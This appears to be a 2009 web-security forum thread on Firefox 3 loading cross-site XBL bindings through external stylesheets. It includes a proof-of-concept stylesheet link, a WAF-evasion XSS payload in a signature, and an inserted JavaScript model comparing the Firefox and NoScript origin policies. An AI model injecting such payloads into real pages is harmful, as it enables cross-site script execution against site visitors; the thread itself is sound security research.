
SLA.CKERS.ORG
HA.CKERS SLACKING
sla.ckers.org web application security lab forums
Q and A for any cross site scripting information. Feel free to ask away. 
XBL Firefox3
Posted by: Gareth Heyes (IP Logged)
Date: March 09, 2009 09:00AM

Seems to work with externally linked style sheets again:

<link href="http://www.businessinfo.co.uk/labs/xss/binding.css" type=text/css rel=stylesheet media=all>

------------------------------------------------------------------------------------------------------------

"-/style=-=expression&#40&#47;&#42;WAFs..Evasion..Filters'/-/*&#39;,/**/alert(/People who say it cannot be done should not interrupt those who are doing it./)//&#41;;"

labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [www.businessinfo.co.uk]

Re: XBL Firefox3
Posted by: nEUrOO (IP Logged)
Date: March 09, 2009 10:25AM

Yup, reported here: [bugzilla.mozilla.org]

nEUrOO -- [rgaucher.info] -- [twitter.com]

Re: XBL Firefox3
Posted by: Gareth Heyes (IP Logged)
Date: March 09, 2009 10:48AM

@nEUrOO

Thanks for adding that; I forgot to add that exact reference. Shame on me. *Slaps self on head*


Re: XBL Firefox3
Posted by: ma1 (IP Logged)
Date: March 09, 2009 11:25AM

Looks like it's not "again": we had been too happy about the "fix" in Fx 3, overlooking that it didn't prevent 3rd party stylesheets from loading XBL from their domains.
The correct approach IMHO (and what I believe everybody, including Jonas Sicking, mistakenly assumed the previous "fix" was about) is NoScript's: blocking every cross-site XBL.
On a good.com page, even if a 3rd party stylesheet, let's say from evil.com, tries to load an XBL from the same evil.com domain (not cross-site with respect to the stylesheet), NoScript blocks the XBL anyway because its domain is different from the document's.

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript
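The difference between the two policies in ma1's post, as an added example that is not part of the thread and is not NoScript's or Firefox's code. It models the Firefox 3 "fix" as "a -moz-binding URL must share the origin of the stylesheet that declares it" and NoScript's rule as "it must share the origin of the document", which is how the thread describes them; the real implementations, the origin-level comparison (NoScript talks about domains), the hostnames good.com and evil.com, and the CSS text are all assumptions constructed for illustration.

```javascript
// Added example: model the two cross-site XBL policies discussed in the thread.
// Assumptions (not from the thread or from any browser/NoScript source):
//  - "Fx3 rule": binding origin must equal the declaring stylesheet's origin
//  - "NoScript rule": binding origin must equal the document's origin
//  - origin (scheme+host+port) is used where the post says "domain"

// Matches -moz-binding: url(...) with optional single/double quotes.
const BINDING_RE = /-moz-binding\s*:\s*url\(\s*(['"]?)([^'")]+)\1\s*\)/gi;

// Return every -moz-binding URL in the CSS text, resolved against the
// stylesheet's own URL (a relative url() is relative to the stylesheet).
function extractBindings(cssText, stylesheetUrl) {
  const found = [];
  for (const m of cssText.matchAll(BINDING_RE)) {
    found.push(new URL(m[2].trim(), stylesheetUrl).href);
  }
  return found;
}

function sameOrigin(a, b) {
  return new URL(a).origin === new URL(b).origin;
}

// Policy as the thread describes the Firefox 3 change: "cross-site" is
// judged relative to the stylesheet, so evil.com CSS may bind evil.com XBL.
function allowedStylesheetRelative(bindingUrl, stylesheetUrl) {
  return sameOrigin(bindingUrl, stylesheetUrl);
}

// Policy as ma1 describes NoScript's: "cross-site" is judged relative to
// the document, so only bindings from the page's own origin are allowed.
function allowedDocumentRelative(bindingUrl, documentUrl) {
  return sameOrigin(bindingUrl, documentUrl);
}

// Evaluate every binding in a third-party stylesheet under both rules.
function evaluate(documentUrl, stylesheetUrl, cssText) {
  return extractBindings(cssText, stylesheetUrl).map((binding) => ({
    binding,
    fx3Rule: allowedStylesheetRelative(binding, stylesheetUrl),
    noScriptRule: allowedDocumentRelative(binding, documentUrl),
  }));
}

// Constructed sample: a good.com page pulls in a stylesheet from evil.com.
// The first two declarations point at evil.com XBL (absolute and relative),
// the third at an XBL file on good.com itself.
const DOCUMENT_URL = "http://good.com/page.html";
const STYLESHEET_URL = "http://evil.com/labs/binding.css";
const SAMPLE_CSS = `
body { -moz-binding: url(http://evil.com/labs/binding.xml#xss); }
div  { -moz-binding: url("binding.xml#xss"); }
span { -moz-binding: url(http://good.com/widgets.xml#ok); }
`;

const RESULTS = evaluate(DOCUMENT_URL, STYLESHEET_URL, SAMPLE_CSS);

if (typeof require !== "undefined" && require.main === module) {
  for (const r of RESULTS) {
    console.log(
      `${r.binding}\n  Fx3 rule: ${r.fx3Rule ? "allow" : "block"}` +
      `\n  NoScript rule: ${r.noScriptRule ? "allow" : "block"}`
    );
  }
}
```

Run with `node`: the two evil.com bindings pass the stylesheet-relative rule and fail the document-relative one, which is exactly the gap ma1 describes; the good.com binding is the only one both rules accept. The regex is deliberately narrow (it ignores `@import`, escapes and comments), so it is a model of the policy, not a CSS sanitizer.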

Re: XBL Firefox3
Posted by: Gareth Heyes (IP Logged)
Date: March 09, 2009 11:40AM

@ma1

Very nice and that makes total sense. Shame FF doesn't do that by default.

